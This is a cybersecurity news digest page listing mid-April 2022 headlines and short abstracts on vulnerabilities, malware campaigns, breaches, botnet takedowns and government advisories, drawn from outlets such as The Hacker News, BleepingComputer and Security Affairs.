Abstract How well do your Linux security practices stack up in today's challenging operating environment? Are you following the correct processes to keep systems up-to-date and protected against the latest threats? Now you can find out thanks to research independently conducted by the Ponemon Institute. The research sponsored by TuxCare sought to understand better how organizations are currently managing the security and stability of their Linux-based systems. The results allow all organizations operating Linux-based systems to benchmark their processes against their peers and best practices. You can get a copy of the complete report HERE if you can't wait to see the findings, but we've highlighted the key takeaways below if you'd like a preview. Research Goals: Understanding the current State of Enterprise Linux Security Management has never been more imperative. The number of high and critical vulnerabilities continues to grow each year significantly, and exploits aga

The Hacker News

April 18, 2022 – General

Cyber Command’s Annual Legal Conference Full Text

Abstract In March, U.S. Cyber Command held its annual legal conference, where members of the command and experts weighed in on the cyber landscape, particularly its legal and national security challenges for the U.S.

Lawfare

April 18, 2022 – Government

CISA adds VMware, Chrome flaws to its Known Exploited Vulnerabilities Catalog Full Text

Abstract US CISA adds a VMware privilege escalation flaw and a Google Chrome type confusion issue to its Known Exploited Vulnerabilities Catalog. The Cybersecurity and Infrastructure Security Agency (CISA) added a VMware privilege escalation flaw (CVE-2022-22960)...

Security Affairs

April 18, 2022 – Attack

Newly found zero-click iPhone exploit used in NSO spyware attacks Full Text

Abstract Digital threat researchers at Citizen Lab have discovered a new zero-click iMessage exploit used to install NSO Group spyware on devices belonging to Catalan politicians, journalists, and activists.

BleepingComputer

April 18, 2022 – Criminals

ZLoader C2 Servers Disrupted in Global Operation Full Text

Abstract Microsoft dismantled ZLoader networks, seizing 65 domains used as its C2 servers and 319 additional domains registered using the domain generation algorithm. The botnet is used to target banks worldwide, including in Brazil, Australia, and North America, to harvest financial data. It’s critical that privat ...

Cyware Alerts - Hacker News

April 18, 2022 – Malware

New SolarMarker Malware Variant Using Updated Techniques to Stay Under the Radar Full Text

Abstract Cybersecurity researchers have disclosed a new version of the SolarMarker malware that packs in new improvements with the goal of updating its defense evasion abilities and staying under the radar. "The recent version demonstrated an evolution from Windows Portable Executables (EXE files) to working with Windows installer package files (MSI files)," Palo Alto Networks Unit 42 researchers said in a report published this month. "This campaign is still in development and going back to using executables files (EXE) as it did in its earlier versions." SolarMarker, also called Jupyter, leverages manipulated search engine optimization (SEO) tactics as its primary infection vector. It's known for its information stealing and backdoor features, enabling the attackers to steal data stored in web browsers and execute arbitrary commands retrieved from a remote server. In February 2022, the operators of SolarMarker were observed using stealthy Windows Registry trick

The Hacker News

April 18, 2022 – General

Apr 10 – Apr 16 Ukraine – Russia the silent cyber conflict Full Text

Abstract This post provides a timeline of the events related to the Russian invasion of Ukraine from the cyber security perspective. Below is the timeline of the events related to the ongoing invasion that occurred in the previous weeks: April 16 - The unceasing...

Security Affairs

April 18, 2022 – Breach

Hackers steal $655K after picking MetaMask seed from iCloud backup Full Text

Abstract MetaMask has published a warning for their iOS users about the seeds of cryptocurrency wallets being stored in Apple's iCloud if app data backup is active.

BleepingComputer

April 18, 2022 – Attack

Enemybot and Fodcha - Leading the Next Waves of Botnet Attacks Full Text

Abstract Researchers discovered Fodcha, a growing botnet that compromises over 100 victims a day. Meanwhile, FortiGuard Labs observed a new DDoS botnet dubbed Enemybot, allegedly working with Keksec. The best way to stop/avoid such attacks is to patch any exploitable vulnerabilities in your network.

Cyware Alerts - Hacker News

April 18, 2022 – Malware

Unofficial Windows 11 upgrade installs info-stealing malware Full Text

Abstract Hackers are luring unsuspecting users with a fake Windows 11 upgrade that comes with malware that steals browser data and cryptocurrency wallets.

BleepingComputer

April 18, 2022 – Malware

New BotenaGo Variant Discovered by Nozomi Networks Labs Full Text

Abstract Researchers from Nozomi Networks Labs discovered a new variant of the Golang-based BotenaGo malware that specifically targets vulnerabilities in Lilin security camera DVR devices.

Security Boulevard

April 18, 2022 – Breach

Beanstalk DeFi platform loses $182 million in flash-loan attack Full Text

Abstract The decentralized, credit-based finance system Beanstalk disclosed on Sunday that it suffered a security breach that resulted in financial losses of $182 million, the attacker stealing $80 million in crypto assets.

BleepingComputer

April 18, 2022 – Vulnerabilities

XSS vulnerability in open source tool PrivateBin patched Full Text

Abstract If a user opens a paste with a specifically crafted SVG attachment and interacts with the preview image while the instance isn’t protected by an appropriate content security policy, an attacker can also execute code.

The Daily Swig

April 18, 2022 – Government

U.S. Cyber Command gives Congress $236M unfunded priorities wish list Full Text

Abstract The wish list shared with Congress shows $236 million worth of unfunded priorities, including about $168 million to support its Cyber Mission Force, a group of 6,200 personnel charged with conducting offensive and defensive cyber operations.

CyberScoop

April 18, 2022 – Phishing

MetaMask warns Apple users over iCloud phishing attacks Full Text

Abstract In a Twitter thread posted on Monday, MetaMask noted that users run the risk of losing their funds if their Apple password “isn’t strong enough” and an attacker is able to phish their account credentials.

Coin Telegraph

April 18, 2022 – Breach

Lakeview Loan Servicing Suffered Data Breach Affecting 2.5 Million Users Full Text

Abstract The company, which claims it is the nation’s fourth-largest servicer, said in public notices the breach impacted 2,537,261 borrowers between October 27, 2021, and December 7, 2021, and was identified in early December.

National Mortgage News

April 17, 2022 – Attack

New Hacking Campaign Targeting Ukrainian Government with IcedID Malware Full Text

Abstract The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new wave of social engineering campaigns delivering IcedID malware and leveraging Zimbra exploits with the goal of stealing sensitive information. Attributing the IcedID phishing attacks to a threat cluster named UAC-0041, the agency said the infection sequence begins with an email containing a Microsoft Excel document (Мобілізаційний реєстр.xls or Mobilization Register.xls) that, when opened, prompts the users to enable macros, leading to the deployment of IcedID. The information-stealing malware, also known as BokBot, has followed a similar trajectory to that of TrickBot, Emotet, and ZLoader, evolving from its earlier roots as a banking trojan to a full-fledged crimeware service that facilitates the retrieval of next-stage implants such as ransomware. The second set of targeted intrusions relate to a new threat group dubbed UAC-0097, with the email including a number of image attachments with a Cont

The Hacker News

April 17, 2022 – Vulnerabilities

Critical RCE Flaw Reported in WordPress Elementor Website Builder Plugin Full Text

Abstract Elementor, a WordPress website builder plugin with over five million active installations, has been found to be vulnerable to an authenticated remote code execution flaw that could be abused to take over affected websites. Plugin Vulnerabilities, which disclosed the flaw last week, said the bug was introduced in version 3.6.0 that was released on March 22, 2022. Roughly 37% of users of the plugin are on version 3.6.x. "That means that malicious code provided by the attacker can be run by the website," the researchers said. "In this instance, it is possible that the vulnerability might be exploitable by someone not logged in to WordPress, but it can easily be exploited by anyone logged in to WordPress who has access to the WordPress admin dashboard." In a nutshell, the issue relates to a case of arbitrary file upload to affected websites, potentially leading to code execution. The bug has been addressed in the latest version of Elementor, with Patchstack

The Hacker News

April 17, 2022 – Botnet

Enemybot, a new DDoS botnet appears in the threat landscape Full Text

Abstract Enemybot is a DDoS botnet that targeted several routers and web servers by exploiting known vulnerabilities. Researchers from Fortinet discovered a new DDoS botnet, tracked as Enemybot, that has targeted several routers and web servers by exploiting...

Security Affairs

April 17, 2022 – Vulnerabilities

Stolen OAuth tokens used to download data from dozens of organizations, GitHub warns Full Text

Abstract GitHub reported that threat actors used stolen OAuth user tokens to exfiltrate private data from several organizations. GitHub uncovered threat actors using stolen OAuth user tokens to gain access to their repositories and download private data from...

Security Affairs

April 17, 2022 – General

Security Affairs newsletter Round 361 by Pierluigi Paganini Full Text

Abstract A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....

Security Affairs

April 16, 2022 – Criminals

New Industrial Spy stolen data market promoted through cracks, adware Full Text

Abstract Threat actors have launched a new marketplace called Industrial Spy that sells stolen data from breached companies, promoting the site through adware and software cracks.

BleepingComputer

April 16, 2022 – Breach

Newman Regional Health notifies 52,224 patients after long-running breach of employee email accounts Full Text

Abstract Newman Regional Health (NRH) is notifying more than 52,000 patients after an investigation revealed unauthorized access to a limited number of their employee e-mail accounts.

Data Breaches

April 16, 2022 – Criminals

Lazarus Group Behind $540 Million Axie Infinity Crypto Hack and Attacks on Chemical Sector Full Text

Abstract The U.S. Treasury Department has implicated the North Korea-backed Lazarus Group (aka Hidden Cobra) in the theft of $540 million from video game Axie Infinity's Ronin Network last month. On Thursday, the Treasury tied the Ethereum wallet address that received the stolen funds to the threat actor and sanctioned the funds by adding the address to the Office of Foreign Assets Control's (OFAC) Specially Designated Nationals (SDN) List. "The FBI, in coordination with Treasury and other U.S. government partners, will continue to expose and combat the DPRK's use of illicit activities – including cybercrime and cryptocurrency theft – to generate revenue for the regime," the intelligence and law enforcement agency said in a statement. The cryptocurrency heist, the second-largest cyber-enabled theft to date, involved the siphoning of 173,600 Ether (ETH) and 25.5 million USD Coins from the Ronin cross-chain bridge, which allows users to transfer their digital as

The Hacker News

April 16, 2022 – General

GitHub suspends accounts of Russian devs at sanctioned companies Full Text

Abstract Russian software developers are reporting that their GitHub accounts are being suspended without warning if they work for or previously worked for companies under US sanctions.

BleepingComputer

April 16, 2022 – Education

Get Lifetime Access to This 60-Hour Java Programming Training Bundle @ 97% Discount Full Text

Abstract Java is a very versatile programming language. From Android apps to Oracle databases, it can be used to power a wide range of software and systems. As with most technical skills, the best way to learn Java is through building your own projects. But you can definitely speed things up with high-quality training. The Complete 2022 Java Coder Bundle provides plenty of that — nine full-length video courses, in fact. The training comes from top-rated instructors, and you get plenty of hands-on projects to try. The included training is worth $1,791. But in a special deal for loyal readers of The Hacker News, you can pick up the bundle for just $39.99. Special Offer — For a limited time, you can get unlimited lifetime access to over 60 hours of Java training for just $39.99. That's an unmissable deal! According to Indeed, the average salary for a Java developer in the US is around $115,000 a year. But even if you don't plan on becoming a specialist, learning Java is a smart move. T

The Hacker News

April 16, 2022 – APT

U.S. Gov believes North Korea-linked Lazarus APT is behind Ronin Validator cyber heist Full Text

Abstract The U.S. government blames North Korea-linked APT Lazarus for the recent $600 million Ronin Validator cyber heist. The U.S. government attributes the recent $600 million Ronin Validator cryptocurrency heist to the North Korea-linked APT Lazarus. The...

Security Affairs

April 16, 2022 – Attack

The unceasing action of Anonymous against Russia Full Text

Abstract This week the Anonymous collective and its affiliates have targeted multiple Russian organizations stealing gigabytes of data. This week Anonymous and other hacker groups affiliated with the collective have launched multiple attacks against Russian...

Security Affairs

April 16, 2022 – Attack

Threat actors target the Ukrainian gov with IcedID malware Full Text

Abstract Threat actors are targeting Ukrainian government agencies with phishing attacks delivering the IcedID malware. The Ukrainian Computer Emergency Response Team (CERT-UA) uncovered new phishing campaigns aimed at infecting systems of Ukrainian government...

Security Affairs

April 15, 2022 – Breach

GitHub Says Hackers Breached Dozens of Organizations Using Stolen OAuth Access Tokens Full Text

Abstract Cloud-based repository hosting service GitHub on Friday revealed that it discovered evidence of an unnamed adversary capitalizing on stolen OAuth user tokens to download private data from several organizations without authorization. "An attacker abused stolen OAuth user tokens issued to two third-party OAuth integrators, Heroku and Travis-CI, to download data from dozens of organizations, including NPM," GitHub's Mike Hanley disclosed in a report. OAuth access tokens are often used by apps and services to authorize access to specific parts of a user's data and communicate with each other without having to share the actual credentials. It's one of the most common methods used to pass authorization from a single sign-on (SSO) service to another application. As of April 15, 2022, the list of affected OAuth applications is as follows - Heroku Dashboard (ID: 145909) Heroku Dashboard (ID: 628778) Heroku Dashboard – Preview (ID: 313468) Heroku Dashboard – Classi

The Hacker News

April 15, 2022 – Breach

GitHub: Attacker breached dozens of orgs using stolen OAuth tokens Full Text

Abstract GitHub revealed today that an attacker is using stolen OAuth user tokens (issued to Heroku and Travis-CI) to download data from private repositories.

BleepingComputer

April 15, 2022 – Attack

Spanish FA report cyber attack to police after email accounts, private texts stolen Full Text

Abstract Documents and information from email accounts, private texts, and audio conversations from top executives of the federation, including president Luis Rubiales, have been stolen in recent months.

ESPN

April 15, 2022 – Vulnerabilities

JekyllBot:5 Flaws Let Attackers Take Control of Aethon TUG Hospital Robots Full Text

Abstract As many as five security vulnerabilities have been addressed in Aethon Tug hospital robots that could enable remote attackers to seize control of the devices and interfere with the timely distribution of medication and lab samples. "Successful exploitation of these vulnerabilities could cause a denial-of-service condition, allow full control of robot functions, or expose sensitive information," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in an advisory published this week. Aethon TUG smart autonomous mobile robots are used in hospitals around the world to deliver medication, transport clinical supplies, and independently navigate around to perform different tasks such as cleaning floors and collecting meal trays. Collectively dubbed "JekyllBot:5" by Cynerio, the flaws reside in the TUG Homebase Server component, effectively allowing attackers to impede the delivery of medications, surveil patients, staff, and hospital interiors thr

The Hacker News

April 15, 2022 – Attack

Threat actors use Zimbra exploits to target organizations in Ukraine Full Text

Abstract Threat actors are targeting Ukrainian government organizations with exploits for XSS vulnerabilities in Zimbra Collaboration Suite (CVE-2018-6882). Ukraine's CERT (CERT-UA) warns of threat actors that are targeting government organizations with exploits...

Security Affairs

April 15, 2022 – Ransomware

The Week in Ransomware - April 15th 2022 - Encrypting Russia Full Text

Abstract While countries worldwide have been the frequent target of ransomware attacks, Russia and CIS countries have been avoided by threat actors. The tables have turned with the NB65 hacking group modifying the leaked Conti ransomware to use in attacks on Russian entities.

BleepingComputer

April 15, 2022 – Attack

Attack on Panasonic Canada Shows Conti is Still Dangerous Full Text

Abstract While the details remain sparse, Panasonic suffered another breach just six months after a high-profile attack—this time at Panasonic Canada. The Conti gang said it was behind the February attack that resulted in the theft of more than 2.8GB of data.

Security Boulevard

April 15, 2022 – Criminals

Haskers Gang Gives Away ZingoStealer Malware to Other Cybercriminals for Free Full Text

Abstract A crimeware-related threat actor known as Haskers Gang has released an information-stealing malware called ZingoStealer for free, allowing other criminal groups to leverage the tool for nefarious purposes. "It features the ability to steal sensitive information from victims and can download additional malware to infected systems," Cisco Talos researchers Edmund Brumaghin and Vanja Svajcer said in a report shared with The Hacker News. "In many cases, this includes the RedLine Stealer and an XMRig-based cryptocurrency mining malware that is internally referred to as 'ZingoMiner.'" But in an interesting twist, the criminal group announced on Thursday that the ownership of the ZingoStealer project is changing hands to a new threat actor, in addition to offering to sell the source code for a negotiable price of $500. Since its inception last month, ZingoStealer is said to be undergoing consistent development and deployed specifically against Russi

The Hacker News

April 15, 2022 – Criminals

Conti Ransomware Gang claims responsibility for the Nordex hack Full Text

Abstract The Conti ransomware gang has claimed responsibility for the recent attack against Nordex, one of the largest manufacturers of wind turbines. The Conti ransomware gang claimed responsibility for the cyberattack that hit the manufacturer of wind turbines...

Security Affairs

April 15, 2022 – Phishing

T-Mobile customers warned of unblockable SMS phishing attacks Full Text

Abstract An ongoing phishing campaign targets T-Mobile customers with malicious links using unblockable texts sent via SMS (Short Message Service) group messages.

BleepingComputer

April 15, 2022 – Vulnerabilities

Critical Vulnerability in Elementor Plugin Impacts Millions of WordPress Sites Full Text

Abstract A critical vulnerability addressed in the Elementor WordPress plugin could allow authenticated users to upload arbitrary files to affected websites, potentially leading to code execution.

Security Week

April 15, 2022 – Criminals

ZingoStealer crimeware released for free in the cybercrime ecosystem Full Text

Abstract A new powerful crimeware called ZingoStealer was released for free by a threat actor known as Haskers Gang. ZingoStealer is a new information-stealer developed by a threat actor known as Haskers Gang who released it for free after they attempted...

Security Affairs

April 15, 2022 – Vulnerabilities

Cisco vulnerability lets hackers craft their own login credentials Full Text

Abstract Cisco has released a security advisory to warn about a critical vulnerability (CVSS v3 score: 10.0), tracked as CVE-2022-20695, impacting the Wireless LAN Controller (WLC) software.

BleepingComputer

April 15, 2022 – Ransomware

Analysis of the SunnyDay ransomware Full Text

Abstract Segurança-Informatica published an analysis of a recent sample of SunnyDay ransomware. As a result of the work, some similarities between other ransomware samples such as Ever101, Medusa Locker, Curator, and Payment45 were found.

Security Affairs

April 15, 2022 – Vulnerabilities

Auth bypass flaw in Cisco Wireless LAN Controller Software allows device takeover Full Text

Abstract Cisco fixed a critical flaw in Cisco Wireless LAN Controller (WLC) that could allow an unauthenticated, remote attacker to take control of affected devices. Cisco has released security patches to fix a critical vulnerability (CVSS score 10), tracked...

Security Affairs

April 15, 2022 – Government

CISA orders agencies to fix actively exploited VMware, Chrome bugs Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) has added nine more security flaws to its list of actively exploited bugs, including a VMware privilege escalation flaw and a Google Chrome zero-day that could be used for remote code execution.

BleepingComputer

April 15, 2022 – Criminals

North Korea’s Lazarus Group Stole More than $600 Million in a Single Hack Targeting Axie Infinity Full Text

Abstract The FBI has blamed hackers associated with the North Korean government for stealing more than $600 million in cryptocurrency last month from a video gaming company -- the latest in a string of audacious cyber heists tied to Pyongyang.

CNN Money

April 15, 2022 – Vulnerabilities

Google fixed third zero-day in Chrome since the start of 2022 Full Text

Abstract Google Chrome 100.0.4896.127 addresses a new high-severity zero-day vulnerability tracked as CVE-2022-1364, actively exploited by threat actors in the wild. Google has released Chrome 100.0.4896.127 for Windows, Mac, and Linux to address a high-severity...

Security Affairs

April 15, 2022 – Cryptocurrency

Cryptocurrency DeFi platforms are now more targeted than ever Full Text

Abstract Hackers are increasingly targeting DeFi (Decentralized Finance) cryptocurrency platforms, with Q1 2022 data showing that more platforms are being targeted than ever before.

BleepingComputer

April 15, 2022 – Vulnerabilities

Cisco’s Webex phoned home audio telemetry even when muted Full Text

Abstract Researchers at two US universities have found that muting popular native video-conferencing apps fails to disable device microphones – and that these apps have the ability to access audio data when muted, or actually do so.

The Register

April 15, 2022 – General

Ways to Develop a Cybersecurity Training Program for Employees Full Text

Abstract Cybersecurity experts would have you believe that your organization’s employees have a crucial role in bolstering or damaging your company's security initiatives. While you may disagree, data breach studies show that employees and negligence are the most...

Security Affairs

April 15, 2022 – Privacy

‘Mute’ button in conferencing apps may not actually mute your mic Full Text

Abstract A new study shows that pressing the mute button on popular video conferencing apps (VCA) may not actually work like you think it should, with apps still listening in on your microphone.

BleepingComputer

April 15, 2022 – Malware

Pipedream, an extremely versatile malware toolkit, could be used for targeting power grids, refineries, and other ICS systems Full Text

Abstract The United States government has issued an advisory for the malware toolkit dubbed Pipedream that cybercriminal groups could use to potentially target all critical infrastructure owners worldwide.

ARS Technica

April 15, 2022 – Ransomware

Analysis of the SunnyDay ransomware Full Text

Abstract The analysis of a recent sample SunnyDay ransomware revealed some similarities with other ransomware, such as Ever101, Medusa Locker, Curator, and Payment45. Segurança-Informatica published an analysis of a recent sample of SunnyDay ransomware. As a result...

Security Affairs

April 15, 2022 – Criminals

Karakurt revealed as data extortion arm of Conti cybercrime syndicate Full Text

Abstract After breaching servers managed by the cybercriminals, security researchers found a connection between Conti ransomware and the recently emerged Karakurt data extortion group, showing that the two gangs are part of the same operation.

BleepingComputer

April 14, 2022 – Vulnerabilities

Critical Auth Bypass Bug Reported in Cisco Wireless LAN Controller Software Full Text

Abstract Cisco has released patches to contain a critical security vulnerability affecting the Wireless LAN Controller (WLC) that could be abused by an unauthenticated, remote attacker to take control of an affected system. Tracked as CVE-2022-20695, the issue has been rated 10 out of 10 for severity and enables an adversary to bypass authentication controls and log in to the device through the management interface of WLC. "This vulnerability is due to the improper implementation of the password validation algorithm," the company said in an advisory. "An attacker could exploit this vulnerability by logging in to an affected device with crafted credentials." Successful exploitation of the flaw could permit an attacker to gain administrator privileges and carry out malicious actions in a manner that allows a complete takeover of the vulnerable system. The company stressed that the issue only affects the following products if running Cisco WLC Software Release 8.10.151.

The Hacker News

April 14, 2022 – General

As State-Backed Cyber Threats Grow, Here’s How the World Is Reacting Full Text

Abstract With the ongoing conflict in Eurasia, cyberwarfare is inevitably making its presence felt. The fight is not only being fought on the fields. There is also a big battle happening in cyberspace. Several cyber-attacks have been reported over the past months. Notably, cyber attacks backed by state actors are becoming prominent. There have been reports of a rise of ransomware and other malware attacks such as Cyclops Blink, HermeticWiper, and BlackCat. These target businesses as well as government institutions and nonprofit organizations. There have been cases of several attempts to shut down online communications and IT infrastructure. The ongoing list of significant cyber incidents curated by the Center for Strategic and International Studies (CSIS) shows that the number of major incidents in January 2022 is 100% higher compared to the same period in the previous year. With the recent activities in cyberspace impacted by the emergence of the geopolitical tumult in February, it

The Hacker News

April 14, 2022 – Vulnerabilities

Critical VMware Cloud Director Bug Could Let Hackers Takeover Entire Cloud Infrastructure Full Text

Abstract Cloud computing and virtualization technology firm VMware on Thursday rolled out an update to resolve a critical security flaw in its Cloud Director product that could be weaponized to launch remote code execution attacks. The issue, assigned the identifier CVE-2022-22966, has a CVSS score of 9.1 out of a maximum of 10. VMware credited security researcher Jari Jääskelä with reporting the flaw. "An authenticated, high privileged malicious actor with network access to the VMware Cloud Director tenant or provider may be able to exploit a remote code execution vulnerability to gain access to the server," VMware said in an advisory. VMware Cloud Director, formerly known as vCloud Director, is used by many well-known cloud providers to operate and manage their cloud infrastructures and gain visibility into datacenters across sites and geographies. The vulnerability could, in other words, end up allowing attackers to gain access to sensitive data and take over private clou

The Hacker News

April 14, 2022 – Vulnerabilities

Google Releases Urgent Chrome Update to Patch Actively Exploited Zero-Day Flaw Full Text

Abstract Google on Thursday shipped emergency patches to address two security issues in its Chrome web browser, one of which it says is being actively exploited in the wild. Tracked as CVE-2022-1364, the tech giant described the high-severity bug as a case of type confusion in the V8 JavaScript engine. Clément Lecigne of Google's Threat Analysis Group has been credited with reporting the flaw on April 13, 2022. As is typically the case with actively exploited zero-day flaws, the company acknowledged it's "aware that an exploit for CVE-2022-1364 exists in the wild." Additional details about the flaw and the identity of the threat actors have been withheld to prevent further abuse. With the latest fix, Google has patched a total of three zero-day vulnerabilities in Chrome since the start of the year. It's also the second type confusion-related bug in V8 to be squashed in less than a month - CVE-2022-0609 - Use-after-free in Animation CVE-2022-1096 - Type confusio

The Hacker News

April 14, 2022 – Criminals

Instagram’s dark side: sexual harassers, crypto scammers, ID thieves Full Text

Abstract A platform for everyone to seamlessly share their best moments online, Instagram is slowly turning into a mecca for the undesirables—from sexual harassers to crypto "investors" helping you "get rich fast." How do you keep yourself safe against such profiles?

BleepingComputer

April 14, 2022 – Attack

Wind turbine firm Nordex hit by Conti ransomware attack Full Text

Abstract The Conti ransomware operation has claimed responsibility for a cyberattack on wind turbine giant Nordex, which was forced to shut down IT systems and remote access to the managed turbines earlier this month.

BleepingComputer

April 14, 2022 – Business

Obsidian Security Raises $90 Million Series C Round to Cement its Leadership in SaaS Security Full Text

Abstract The funding was led by Menlo Ventures, Norwest Venture Partners, and IVP, with participation from existing investors Greylock, Wing, and GV. Obsidian will add Menlo Ventures Partner Venky Ganesan to its board of directors.

Yahoo Finance

April 14, 2022 – Policy and Law

Ethereum Developer Jailed 63 Months for Helping North Korea Evade Sanctions Full Text

Abstract A U.S. court has sentenced former Ethereum developer Virgil Griffith to five years and three months in prison and to pay a $100,000 fine for conspiring with North Korea to help use cryptocurrencies to circumvent sanctions imposed on the country. "There is no question North Korea poses a national security threat to our nation, and the regime has shown time and again it will stop at nothing to ignore our laws for its own benefit," U.S. Attorney Damian Williams said in a statement. The sentencing comes more than six months after Griffith pleaded guilty to violating the International Emergency Economic Powers Act (IEEPA) by offering technical advice to the hermit kingdom with regards to the use of digital currency to bypass economic restrictions. Griffith was arrested in November 2019. North Korea is known to rely on cryptocurrency heists to get around international sanctions and use it to help fund programs to build weapons of mass destruction. Indeed, the nation-st

The Hacker News

April 14, 2022 – Government

Cyberspace and War in Ukraine: Prepare for Worse Full Text

Abstract Russia’s relatively weaker position within the global financial system has limited Putin’s punitive options in response to Western economic and financial sanctions. Cyberspace offers attractive alternative options for hackers and security planners in Moscow.

Lawfare

April 14, 2022 – Government

US gov agencies and private firms warn nation-state actors are targeting ICS & SCADA devices Full Text

Abstract The US government agencies warned of threat actors that are targeting ICS and SCADA systems from various vendors. The Department of Energy (DOE), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal...

Security Affairs

April 14, 2022 – APT

Feds: APTs Have Tools That Can Take Over Critical Infrastructure Full Text

Abstract Threat actors have developed custom modules to compromise various ICS devices as well as Windows workstations that pose an imminent threat, particularly to energy providers.

Threatpost

April 14, 2022 – Vulnerabilities

Critical Windows RPC CVE-2022-26809 flaw raises concerns — Patch now Full Text

Abstract Microsoft has fixed a new Windows RPC CVE-2022-26809 vulnerability that is raising concerns among security researchers due to its potential for widespread, significant cyberattacks once an exploit is developed. Therefore, all organizations need to apply Windows security updates as soon as possible.

BleepingComputer

April 14, 2022 – Vulnerabilities

Experts warn of concerns around Microsoft RPC bug Full Text

Abstract Windows hosts running the Server Message Block protocol (SMB protocol) are vulnerable to this bug. SMB protocols allow users to share access to files and tools on remote servers.

The Record

April 14, 2022 – Cryptocurrency

Rarible NFT Marketplace Flaw Could’ve Let Attackers Hijack Crypto Wallets Full Text

Abstract Cybersecurity researchers have disclosed a now-fixed security flaw in the Rarible non-fungible token (NFT) marketplace that, if successfully exploited, could have led to account takeover and theft of cryptocurrency assets. "By luring victims to click on a malicious NFT, an attacker can take full control of the victim's crypto wallet to steal funds," Check Point researchers Roman Zaikin, Dikla Barda, and Oded Vanunu said in a report shared with The Hacker News. Rarible, an NFT marketplace that enables users to create, buy, and sell digital NFT art like photographs, games, and memes, has over 2.1 million active users. "There is still a huge gap, in terms of security, between Web2 and Web3 infrastructure," Vanunu, head of products vulnerabilities research at Check Point, said in a statement shared with The Hacker News. "Any small vulnerability can possibly allow cyber criminals to hijack crypto wallets behind the scenes. We are still in a st

The Hacker News

April 14, 2022 – Government

CISA adds Windows CLFS Driver Privilege Escalation flaw to its Known Exploited Vulnerabilities Catalog Full Text

Abstract The U.S. CISA added the CVE-2022-24521 Microsoft Windows CLFS Driver Privilege Escalation Vulnerability to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2022-24521 privilege...

Security Affairs

April 14, 2022 – Government

FBI: Payment app users targeted in social engineering attacks Full Text

Abstract Cybercriminals are attempting to trick American users of digital payment apps into making instant money transfers in social engineering attacks using text messages with fake bank fraud alerts.

BleepingComputer

April 14, 2022 – Government

CISA Issues Warning About Malicious Tools Targeting ICS/SCADA Devices Full Text

Abstract The advisory highlights that OPC Unified Architecture (OPC UA) servers and multiple versions of Programmable Logic Controllers (PLCs) from Schneider Electric and OMRON are vulnerable to such attacks.

Cyware Alerts - Hacker News

April 14, 2022 – Botnet

New EnemyBot DDoS Botnet Borrows Exploit Code from Mirai and Gafgyt Full Text

Abstract A threat group that pursues crypto mining and distributed denial-of-service (DDoS) attacks has been linked to a new botnet called Enemybot, which has been discovered enslaving routers and Internet of Things (IoT) devices since last month. "This botnet is mainly derived from Gafgyt's source code but has been observed to borrow several modules from Mirai's original source code," Fortinet FortiGuard Labs said in a report this week. The botnet has been attributed to an actor named Keksec (aka Kek Security, Necro, and FreakOut), which has been linked to multiple botnets such as Simps, Ryuk (not to be confused with the ransomware of the same name), and Samael, and has a history of targeting cloud infrastructure to carry out crypto mining and DDoS operations. Primarily targeting routers from Seowon Intech, D-Link, and iRZ to propagate its infections and grow in volume, an analysis of the malware specimen has highlighted Enemybot's obfuscation attemp

The Hacker News

April 14, 2022 – Vulnerabilities

Critical VMware Workspace ONE Access CVE-2022-22954 flaw actively exploited Full Text

Abstract Threat actors are actively exploiting a critical vulnerability in VMware Workspace ONE Access and Identity Manager recently patched by the vendor. Threat actors are actively exploiting a critical flaw, tracked as CVE-2022-22954, in VMware Workspace...

Security Affairs

April 14, 2022 – Vulnerabilities

Google Chrome emergency update fixes zero-day used in attacks Full Text

Abstract Google has released Chrome 100.0.4896.127 for Windows, Mac, and Linux, to fix a high-severity zero-day vulnerability actively used by threat actors in attacks.

BleepingComputer

April 14, 2022 – Phishing

Campaign Similar to Operation Kitty Phishing Found Targeting South Koreans Full Text

Abstract According to researchers, the campaign was first observed in April and aims to steal data from individuals in South Korea. They are targeted via spear-phishing emails that include malicious Word documents.

Cyware Alerts - Hacker News

April 14, 2022 – Botnet

Microsoft Disrupts ZLoader Cybercrime Botnet in Global Operation Full Text

Abstract Microsoft and a consortium of cybersecurity companies took legal and technical steps to disrupt the ZLoader botnet, seizing control of 65 domains that were used to control and communicate with the infected hosts. "ZLoader is made up of computing devices in businesses, hospitals, schools, and homes around the world and is run by a global internet-based organized crime gang operating malware as a service that is designed to steal and extort money," Amy Hogan-Burney, general manager of Microsoft's Digital Crimes Unit (DCU), said. The operation, Microsoft said, was undertaken in collaboration with ESET, Lumen's Black Lotus Labs, Palo Alto Networks Unit 42, Avast, Financial Services Information Sharing and Analysis Center (FS-ISAC), and Health Information Sharing and Analysis Center (H-ISAC). As a result of the disruption, the domains are now redirected to a sinkhole, effectively preventing the botnet's criminal operators from contacting the compromised devices.

The Hacker News

April 14, 2022 – Botnet

Microsoft has taken legal and technical action to dismantle the Zloader botnet Full Text

Abstract Microsoft's Digital Crimes Unit (DCU) announced that it has shut down dozens of C2 servers used by the infamous ZLoader botnet. Microsoft dismantled the C2 infrastructure used by the ZLoader trojan with the help of telecommunications providers around the world...

Security Affairs

April 14, 2022 – Malware

Windows 11 tool to add Google Play secretly installed malware Full Text

Abstract A popular Windows 11 ToolBox script used to add the Google Play Store to the Android Subsystem has secretly infected users with malicious scripts, Chrome extensions, and potentially other malware.

BleepingComputer

April 14, 2022 – Malware

Hafnium’s New Malware Hides Behind Scheduled Tasks Full Text

Abstract Microsoft linked the Chinese-backed Hafnium group to Tarrask, a defense evasion malware used by cybercriminals to attain persistence in compromised Windows environments. Researchers uncovered recent malicious activity in which hackers abused an unpatched zero-day vulnerability for their initia ...

Cyware Alerts - Hacker News

April 14, 2022 – Vulnerabilities

Microsoft increases awards for high-impact Microsoft 365 bugs Full Text

Abstract Microsoft has increased the maximum awards for high-impact security flaws reported through the Microsoft 365 and the Dynamics 365 / Power Platform bug bounty programs.

BleepingComputer

April 14, 2022 – Business

Cloud Security Startup DoControl Raises $30 Million Full Text

Abstract The startup said it plans to use the money to scale its SaaS data security product offerings, fuel global growth through aggressive hiring, and build strategic partner programs.

Security Week

April 14, 2022 – Malware

New ZingoStealer infostealer drops more malware, cryptominers Full Text

